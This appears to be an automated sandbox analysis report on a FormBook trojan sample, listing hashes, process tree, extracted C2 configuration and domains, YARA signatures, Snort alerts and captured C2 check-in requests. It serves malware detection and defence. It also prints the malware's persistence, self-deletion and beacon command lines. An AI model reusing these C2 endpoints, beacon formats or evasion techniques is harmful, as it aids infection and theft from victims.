
Windows Analysis Report tgamf4XuLa

Overview

General Information

Sample Name: tgamf4XuLa (renamed file extension from none to exe)
Analysis ID: 483617
MD5: f8146a71dedc3eeeaa1624d6832c39a4
SHA1: b1007a3beab21c77513bb9c4e6fc2a04c6346c04
SHA256: 3611c1a2e9d1897825d5e7100a1c01d807f62a9c75d5f12602c168b0726d56ca
Tags: 32 exe trojan

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • tgamf4XuLa.exe (PID: 6056 cmdline: 'C:\Users\user\Desktop\tgamf4XuLa.exe' MD5: F8146A71DEDC3EEEAA1624D6832C39A4)
    • schtasks.exe (PID: 5080 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • tgamf4XuLa.exe (PID: 1956 cmdline: C:\Users\user\Desktop\tgamf4XuLa.exe MD5: F8146A71DEDC3EEEAA1624D6832C39A4)
      • explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6364 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6428 cmdline: /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.dressmids.com/vuja/"], "decoy": ["maryjanearagon.com", "casualwearus.com", "thephonecasedepot.com", "twinpeaksyouthbasketball.com", "secure-filliale.com", "thecoastalhomeshop.com", "poloandaccessories.com", "thesouthernchildtn.com", "whereallroadslead.com", "harecase.com", "discomountainkombucha.com", "tjandamber.com", "yctyhb.com", "miccitypb.com", "niliana.com", "fraktal.media", "goodgrrrldesign.com", "tcheapvrwdshop.com", "orchid-nirvana2.homes", "mckinleyacreage.com", "3333tax.com", "florentinatravel.com", "ecorna.com", "bold2x.com", "syzhtr.com", "seifenliebe.info", "6144prestoncircle.com", "simmetrypcs.com", "bottomslum.com", "affordablejetski.net", "hellocharmaine.com", "jvfojqjr.icu", "colourfulcollective.travel", "life2you.com", "d0berman245.xyz", "realstylecelebz.com", "thisisalemon.com", "fizzandfun.com", "expertexceleratorchallenge.com", "twpjg.com", "testnora.com", "knothairbandsny.com", "racanelliestimating.com", "aryaanenterprises.com", "cherrybunk.life", "beard-fuel.com", "reebootwithjoe.com", "vip5-paizacasino.com", "nobelcafe.com", "saifreshmart.com", "astcvic.com", "noblehousekitchen.com", "facebooktransfer.com", "humanareachreards.com", "parttimesneakerhead.com", "geliboluwebtasarim.com", "ripvangordo.com", "hitcitybaseball.net", "hostingfun.net", "gfd.xyz", "gighomesale.com", "allthatrom.com", "allenleather.com", "officallive33.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x4695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x4181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x4797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x33fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xa82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x66b9:$sqlite3step: 68 34 1C 7B E1
  • 0x67cc:$sqlite3step: 68 34 1C 7B E1
  • 0x66e8:$sqlite3text: 68 38 2A 90 C5
  • 0x680d:$sqlite3text: 68 38 2A 90 C5
  • 0x66fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x6823:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.tgamf4XuLa.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.2.tgamf4XuLa.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.tgamf4XuLa.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x158b9:$sqlite3step: 68 34 1C 7B E1
  • 0x159cc:$sqlite3step: 68 34 1C 7B E1
  • 0x158e8:$sqlite3text: 68 38 2A 90 C5
  • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
  • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
6.2.tgamf4XuLa.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.2.tgamf4XuLa.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.dressmids.com/vuja/"], "decoy": ["maryjanearagon.com", "casualwearus.com", "thephonecasedepot.com", "twinpeaksyouthbasketball.com", "secure-filliale.com", "thecoastalhomeshop.com", "poloandaccessories.com", "thesouthernchildtn.com", "whereallroadslead.com", "harecase.com", "discomountainkombucha.com", "tjandamber.com", "yctyhb.com", "miccitypb.com", "niliana.com", "fraktal.media", "goodgrrrldesign.com", "tcheapvrwdshop.com", "orchid-nirvana2.homes", "mckinleyacreage.com", "3333tax.com", "florentinatravel.com", "ecorna.com", "bold2x.com", "syzhtr.com", "seifenliebe.info", "6144prestoncircle.com", "simmetrypcs.com", "bottomslum.com", "affordablejetski.net", "hellocharmaine.com", "jvfojqjr.icu", "colourfulcollective.travel", "life2you.com", "d0berman245.xyz", "realstylecelebz.com", "thisisalemon.com", "fizzandfun.com", "expertexceleratorchallenge.com", "twpjg.com", "testnora.com", "knothairbandsny.com", "racanelliestimating.com", "aryaanenterprises.com", "cherrybunk.life", "beard-fuel.com", "reebootwithjoe.com", "vip5-paizacasino.com", "nobelcafe.com", "saifreshmart.com", "astcvic.com", "noblehousekitchen.com", "facebooktransfer.com", "humanareachreards.com", "parttimesneakerhead.com", "geliboluwebtasarim.com", "ripvangordo.com", "hitcitybaseball.net", "hostingfun.net", "gfd.xyz", "gighomesale.com", "allthatrom.com", "allenleather.com", "officallive33.com"]}
Yara detected FormBook
Source: Yara match | File source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: tgamf4XuLa.exe | Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\HpnpObXJP.exe | Joe Sandbox ML: detected
Source: 6.2.tgamf4XuLa.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: tgamf4XuLa.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: tgamf4XuLa.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: control.pdb source: tgamf4XuLa.exe, 00000006.00000002.343389175.0000000001380000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: tgamf4XuLa.exe, 00000006.00000002.343446284.00000000013F0000.00000040.00000001.sdmp, control.exe, 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: tgamf4XuLa.exe, 00000006.00000002.343446284.00000000013F0000.00000040.00000001.sdmp, control.exe
Source: Binary string: control.pdbUGP source: tgamf4XuLa.exe, 00000006.00000002.343389175.0000000001380000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\control.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49780 -> 52.25.92.0:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49780 -> 52.25.92.0:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49780 -> 52.25.92.0:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49790 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49790 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49790 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49791 -> 99.83.154.118:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49791 -> 99.83.154.118:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49791 -> 99.83.154.118:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 34.98.99.30:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 34.98.99.30:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 34.98.99.30:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49793 -> 91.195.240.94:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49793 -> 91.195.240.94:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49793 -> 91.195.240.94:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 91.195.240.94 80
Source: C:\Windows\explorer.exe | Domain query: www.tjandamber.com
Source: C:\Windows\explorer.exe | Domain query: www.fraktal.media
Source: C:\Windows\explorer.exe | Domain query: www.expertexceleratorchallenge.com
Source: C:\Windows\explorer.exe | Network Connect: 52.25.92.0 80
Source: C:\Windows\explorer.exe | Network Connect: 34.98.99.30 80
Source: C:\Windows\explorer.exe | Domain query: www.d0berman245.xyz
Source: C:\Windows\explorer.exe | Domain query: www.cherrybunk.life
Source: C:\Windows\explorer.exe | Domain query: www.hellocharmaine.com
Source: C:\Windows\explorer.exe | Domain query: www.syzhtr.com
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Network Connect: 99.83.154.118 80
Source: C:\Windows\explorer.exe | Network Connect: 103.72.144.19 80
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe | DNS query: www.d0berman245.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.dressmids.com/vuja/
Source: Joe Sandbox View | ASN Name: SEDO-ASDE SEDO-ASDE
Source: Joe Sandbox View | ASN Name: AMAZON-02US AMAZON-02US
Source: global traffic | HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=xxaskX4zCBVE3yBbpvO7oTQxeCyuhPQrJ3bXakBVisDWUfPX6szXkiX7lnBBy6F9sRNz HTTP/1.1 | Host: www.cherrybunk.life | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /vuja/?a6PLdH6=knesP9qPdEIwhrsdCBVrK6TYPa8ARfupLdS+O1KjpVkHadf5O3a6XCWpr2FomIuS86ow&SrK0m=8pbLu8l0SV1lo HTTP/1.1 | Host: www.d0berman245.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=+jKwoP3rxSUE2G3GWZal8U7hYP6reGb39kDXBTdBOy+lOhqfFK02kSVdLKlhCp2Y/9bB HTTP/1.1 | Host: www.fraktal.media | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /vuja/?a6PLdH6=QFFty8wvqhCytrBgHARX2ZkDyAOTnUZPmU5cb5PMMJEj0bAx9fBxVhYMw+XdeJtryV9Z&SrK0m=8pbLu8l0SV1lo HTTP/1.1 | Host: www.expertexceleratorchallenge.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY HTTP/1.1 | Host: www.hellocharmaine.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /vuja/?a6PLdH6=u+wR1aKzpDV/TxGllf2QnEgeBGa/HBhCNRhMkmFjTPYp6U2j3/+A9H921q8yWaN2LpI/&SrK0m=8pbLu8l0SV1lo HTTP/1.1 | Host: www.syzhtr.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=O/mUfy2FFtS6I/aReU4qHel2aPwRekNUtr7VAEKDTW8BEYcE6LKZB1SF0N7UsHI7MTf5 HTTP/1.1 | Host: www.tjandamber.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=mvPzLoePd3E50JyZDmieD6pkHjcUl/YW6tCUslk4/nfE0VzZdnTMarol9oC9qsPy2Se0 HTTP/1.1 | Host: www.realstylecelebz.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /vuja/?a6PLdH6=mgzvXufYj6psHtNzSOMfQOc1unGQJGuCHGGdhDQCsGfwe59mkNL58xvD94UsnjjJj5NK&SrK0m=8pbLu8l0SV1lo HTTP/1.1 | Host: www.dressmids.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd HTTP/1.1 | Host: www.discomountainkombucha.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 91.195.240.94 91.195.240.94
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 15 Sep 2021 08:10:24 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmp | String found in binary or memory: https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886
Source: control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmp | String found in binary or memory: https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png
Source: control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmp | String found in binary or memory: https://www.value-domain.com/
Source: control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmp | String found in binary or memory: https://www.value-domain.com/modall.php
Source: unknown | DNS traffic detected: queries for: www.cherrybunk.life

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
.NET source code contains very large strings
Source: tgamf4XuLa.exe, Forms/mainForm.cs | Long String: Length: 38272
Source: HpnpObXJP.exe.0.dr, Forms/mainForm.cs | Long String: Length: 38272
Source: 0.0.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.cs | Long String: Length: 38272
Source: 0.2.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.cs | Long String: Length: 38272
Source: 6.2.tgamf4XuLa.exe.860000.1.unpack, Forms/mainForm.cs | Long String: Length: 38272
Source: 6.0.tgamf4XuLa.exe.860000.0.unpack, Forms/mainForm.cs | Long String: Length: 38272
Source: tgamf4XuLa.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
